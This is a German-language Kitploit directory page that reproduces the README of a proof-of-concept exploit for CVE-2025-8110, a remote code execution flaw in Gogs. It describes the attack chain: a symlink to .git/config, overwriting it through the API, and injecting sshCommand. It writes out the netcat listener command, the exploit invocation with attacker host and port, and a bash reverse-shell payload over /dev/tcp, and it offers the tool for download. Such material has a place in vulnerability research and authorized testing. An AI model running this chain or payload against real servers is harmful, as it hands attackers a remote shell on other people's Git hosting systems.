Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-8110 — Proof-of-concept-Exploit für CVE-2025-8110, eine Gogs-RCE-Sicherheitslücke, die Path Traversal über symbolische Links und sshCommand-Injection ausnutzt, um eine Reverse Shell zu liefern. | Kitploit
Tools/GitHubGitHub/ghxstsec/cve-2025-8110
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRed TeamingPayload-Entwicklung
GitHubghxstsec/cve-2025-8110

CVE-2025-8110

Proof-of-concept-Exploit für CVE-2025-8110, eine Gogs-RCE-Sicherheitslücke, die Path Traversal über symbolische Links und sshCommand-Injection ausnutzt, um eine Reverse Shell zu liefern.

Repository anzeigen
53vor 4 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Gogs RCE Exploit (CVE-2025-8110)

Python License Expertise

Ein Proof of Concept (PoC) für CVE-2025-8110, eine kritische Schwachstelle in Gogs, die Remote-Code-Ausführung (RCE) durch Manipulation von .git/config mittels symbolischer Link-Umgehungen und sshCommand-Injection ermöglicht.

📖 Übersicht

Dieser Exploit zielt auf einen Path-Traversal-Fehler in der Gogs-API-Inhaltsverwaltung ab. Ein authentifizierter Benutzer kann:

  1. Ein Repository erstellen und einen symbolischen Link pushen, der auf die interne .git/config verweist.
  2. Die API verwenden, um die Zielkonfigurationsdatei über den Symlink zu überschreiben.
  3. Einen bösartigen sshCommand injizieren, um eine Reverse Shell auszuführen, wenn der Server Git-Operationen durchführt.

🚀 Funktionen

  • Automatisierter Workflow: Übernimmt Anmeldung, Repo-Erstellung, Symlink-Bereitstellung und -Vergiftung.
  • Robuste Kodierung: Kodiert Anmeldedaten automatisch per URL, um Sonderzeichen (z. B. !, @) zu handhaben.
  • Umfangreiche Ausgabe: Hochsichtbares Logging mit der Rich-Bibliothek.

🛠 Voraussetzungen

  • Python 3.12+
  • Git auf dem lokalen System installiert.
  • Gültige Anmeldedaten auf der Ziel-Gogs-Instanz.

📦 Installation

  1. Klonen Sie das Repository:
    root@kitploit:~
    git clone https://github.com/Ghxstsec/CVE-2025-8110.git
    cd CVE-2025-8110
    
  2. Abhängigkeiten installieren:
    root@kitploit:~
    pip3 install -r requirements.txt
    

💻 Verwendung

Starten Sie Ihren Listener:

root@kitploit:~
nc -lvnp 6666

Führen Sie den Exploit aus:

root@kitploit:~
python3 CVE-2025-8110-RCE.py -u [http://target-gogs.htb:3000](http://target-gogs.htb:3000) -lh <YOUR_IP> -lp 6666 -p 'YourPassword123!'

Argumente:

Kern der Schwachstelle:

root@kitploit:~
sshCommand = bash -c 'bash -i >& /dev/tcp/IP/PORT 0>&1' #

Wenn Gogs einen Git-Befehl ausführt, der Netzwerktransport erfordert (wie eine Mirror-Synchronisation oder eine interne Referenzprüfung), wird der sshCommand aufgerufen, was die Reverse Shell auslöst.

⚠️ Rechtlicher Hinweis: Dieses Tool dient ausschließlich Bildungs- und autorisierten Sicherheitstestzwecken. Der Autor übernimmt keine Verantwortung für Missbrauch oder Schäden, die durch dieses Skript verursacht werden. Unbefugter Zugriff auf Computersysteme ist illegal.

Tool herunterladen
ArgumentBeschreibung
-u, --urlBasis-URL der Ziel-Gogs-Instanz (z. B. http://target.htb:3000).
-lh, --hostAngreifer-IP (LHOST), zu der die Reverse Shell zurückverbindet.
-lp, --portListener-Port (LPORT) auf Ihrer Maschine.
-p, --passwordPasswort für das Konto pwnuser zur Authentifizierung.
-x, --proxy(Optional) Leitet den Datenverkehr über einen lokalen Proxy (Standard: http://localhost:8080).